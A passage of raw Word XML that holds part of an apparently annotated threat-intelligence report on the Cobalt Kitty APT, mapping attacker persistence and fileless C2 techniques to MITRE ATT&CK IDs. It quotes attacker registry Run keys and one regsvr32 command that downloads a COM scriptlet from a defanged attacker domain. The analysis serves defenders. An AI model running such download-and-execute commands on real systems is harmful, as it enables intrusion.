          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1543.003</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001A63B7" w:rsidRPr="001A63B7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : &lt;Create or Modify System Process&gt;:Windows Service </w:t>
      </w:r>
      <w:r w:rsidR="001A63B7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2BD221" w14:textId="6425AC06" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">● Windows Scheduled </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">Tasks </w:t>
      </w:r>
      <w:r w:rsidR="001A63B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A63B7" w:rsidRPr="001A63B7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001A63B7" w:rsidRPr="001A63B7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A63B7" w:rsidRPr="001A63B7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1053.005 : &lt;Scheduled Task/Job&gt;:Scheduled Task )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BC218D" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43B13C71" w14:textId="4AB974A1" w:rsidR="00BF2A6A" w:rsidRPr="00981445" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00981445">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Windows Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01689D49" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attackers used the Windows Registry Autorun to execute VBScript and PowerShell scripts </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2566B204" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">residing in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProgramData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> folder, which is hidden by default: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC81BA4" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>HKU\[redacted]\Software\Microsoft\Windows\CurrentVersion\Run\Java Update Schedule Check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD96643" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\syscheck </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31350E5A" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DHCP Agent </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B746FD4" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>HKU\[redacted]\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activation Checker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF30FC1" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HKU\[redacted]\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Update </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B01CA1" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Examples of the values of the above registry keys: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06472B34" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>The purpose of those .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scripts was to launch Cobalt Strike PowerShell scripts mainly </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73510DC7" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">consisting of Cobalt Strike Beacon. Some of the files found in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProgramData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> appear to be .txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078A8BB9" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">files. However, their content is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VBscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691EF891" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In addition, the attackers used NTFS Alternate Data Stream to hide their payloads. This is a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6432D400" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>rather old trick to hide data from the unsuspecting users and security solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFBF179" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The code inside the ‘hidden’ .txt file launches a PowerShell process with a base64-encoded </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556C2A20" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A10A24" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26DA8F6D" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRPr="00981445" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00981445">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Windows Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CAD237" w14:textId="46DCFCC9" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attackers created and/or modified Windows Services to ensure the loading of the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EF6F01" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PowerShell scripts on the compromised machines. These scripts are mostly </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerShellencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Cobalt Strike’s Beacon payloads: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C827033" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Backdoor exploits DLL hijacking against </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13173184" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>According to Microsoft’s documentation, Windows Search Service (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">), which is a default </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD35863" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">component in Windows OS, runs automatically. Once </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> starts, it launches </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F2BA15" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SearchIndexer.exe and SearchProtocolHost.exe applications. These applications are vulnerable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD9BC06" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">to “Phantom DLL Hijacking” and were exploited in other targeted attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0F30E2" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attackers placed a fake “msfte.dll” under the system32 folder, where the vulnerable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D32DEF" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>©2017 Cybereason Inc. All rights reserved. 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00960FF5" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">applications reside by default. This ensured that the fake “msfte.dll” would be loaded each time </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E2DA97" w14:textId="77777777" w:rsidR="00367647" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> launched these applications: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CC4D2A" w14:textId="77777777" w:rsidR="00367647" w:rsidRDefault="00367647" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06331281" w14:textId="77777777" w:rsidR="00367647" w:rsidRDefault="00367647" w:rsidP="00367647">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Google Update: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7059A538" w14:textId="77777777" w:rsidR="00367647" w:rsidRDefault="00367647" w:rsidP="00367647">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>©2017 Cybereason Inc. All rights reserved. 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2444B0" w14:textId="4BD65C30" w:rsidR="00367647" w:rsidRDefault="00367647" w:rsidP="00367647">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attackers exploited a DLL hijacking vulnerability </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001A63B7">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="001A63B7" w:rsidRPr="001A63B7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001A63B7" w:rsidRPr="001A63B7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1574 Hijack Execution Flow</w:t>
      </w:r>
      <w:r w:rsidR="001A63B7" w:rsidRPr="001A63B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A63B7">
        <w:t xml:space="preserve"> - Exact DLL hijacking approach unclear ) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in a legitimate Google Update binary, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6BEAC8" w14:textId="77777777" w:rsidR="00367647" w:rsidRDefault="00367647" w:rsidP="00367647">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">which was deployed along with a malicious DLL (goopdate.dll). By default, GoogleUpdate.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731AC223" w14:textId="77777777" w:rsidR="00367647" w:rsidRDefault="00367647" w:rsidP="00367647">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">creates a scheduled task that checks if a new version of Google products is available. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64969D7E" w14:textId="77777777" w:rsidR="00367647" w:rsidRDefault="00367647" w:rsidP="00367647">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As a result, each time GoogleUpdate.exe application ran, it automatically loaded the malicious </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0124D075" w14:textId="77777777" w:rsidR="00367647" w:rsidRDefault="00367647" w:rsidP="00367647">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>goopdate.dll:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5DB845" w14:textId="77777777" w:rsidR="00367647" w:rsidRDefault="00367647" w:rsidP="00367647">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For further details about the backdoor, please refer to Cobalt Kitty Attacker’s Arsenal: Deep dive </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603EAE9F" w14:textId="77777777" w:rsidR="00367647" w:rsidRDefault="00367647" w:rsidP="00367647">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">into the tools used in the APT. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152FE155" w14:textId="77777777" w:rsidR="00367647" w:rsidRDefault="00367647" w:rsidP="00367647">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3867B290" w14:textId="77777777" w:rsidR="00367647" w:rsidRDefault="00367647" w:rsidP="00367647">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Outlook Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3A0305" w14:textId="77777777" w:rsidR="00367647" w:rsidRDefault="00367647" w:rsidP="00367647">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attackers used a malicious Outlook backdoor macro to communicate with the C2 servers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3592C650" w14:textId="77777777" w:rsidR="00367647" w:rsidRDefault="00367647" w:rsidP="00367647">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">and exfiltrate data. To make sure the malicious macro ran, they edited a specific registry value </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2EB9F6" w14:textId="3C9B950B" w:rsidR="00367647" w:rsidRDefault="00367647" w:rsidP="00367647">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">to create persistence: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CC160B">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00CC160B" w:rsidRPr="00CC160B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1547.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CC160B" w:rsidRPr="00CC160B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC160B" w:rsidRPr="00CC160B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CC160B" w:rsidRPr="00CC160B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution: Registry Run Keys / Startup Folder</w:t>
      </w:r>
      <w:r w:rsidR="00CC160B">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2D1F58" w14:textId="77777777" w:rsidR="00367647" w:rsidRDefault="00367647" w:rsidP="00367647">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:r w:rsidRPr="00367647">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C2 Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A191C32" w14:textId="77777777" w:rsidR="00CE52B4" w:rsidRDefault="00CE52B4" w:rsidP="00CE52B4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Cobalt Strike Fileless Infrastructure (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B5301" w14:textId="77777777" w:rsidR="00CE52B4" w:rsidRDefault="00CE52B4" w:rsidP="00CE52B4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attackers chose to implement a multi-stage payload delivery infrastructure in the first phase </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8C009D" w14:textId="77777777" w:rsidR="00CE52B4" w:rsidRDefault="00CE52B4" w:rsidP="00CE52B4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">of the attack. The motivation for fileless operation is clear: this approach has a low forensic </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78006A2A" w14:textId="77777777" w:rsidR="00CE52B4" w:rsidRDefault="00CE52B4" w:rsidP="00CE52B4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">footprint since most of the payloads are downloaded from the C&amp;C and executed in-memory </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F5C166" w14:textId="77777777" w:rsidR="00CE52B4" w:rsidRDefault="00CE52B4" w:rsidP="00CE52B4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">without touching the disk. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF31ED" w14:textId="77777777" w:rsidR="00CE52B4" w:rsidRDefault="00CE52B4" w:rsidP="00CE52B4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Multi-Stage Payload Delivery </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583B3F65" w14:textId="5F79E6CE" w:rsidR="00CE52B4" w:rsidRDefault="00CE52B4" w:rsidP="00CE52B4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE52B4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B74EC00" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>PowerShell downloader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8EAD97" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>A PowerShell one-liner downloads and executes a PowerShell payload from the C&amp;C server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA661C8" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Regsvr32.exe downloader command (COM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Scriptlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E58BC1" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D020D06" w14:textId="1A95E100" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The fileless infrastructure also used another type of downloader, which is based on COM </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BA7113" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scriptlets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">). This technique is well documented and has been used extensively in the last </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7590D432" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">year. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50296A63" w14:textId="2A991F63" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attackers downloaded COM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scriptlets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> using regsvr32.exe:</w:t>
      </w:r>
      <w:r w:rsidR="002A1E3D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002A1E3D">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="002A1E3D" w:rsidRPr="002A1E3D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1218.011</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002A1E3D" w:rsidRPr="002A1E3D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : &lt;System Binary Proxy Execution&gt;:Rundll32 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE34B47" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>regsvr32 /s /n /u /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>i:hxxp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>support.chatconnecting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(.)com:80/pic.png</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scrobj.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCBD18A" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>C&amp;C payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F326070" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Following are a few examples of C&amp;C payloads used as part of the fileless payload delivery </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAAA990" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">infrastructure. </w:t>
      </w:r>
    </w:p>
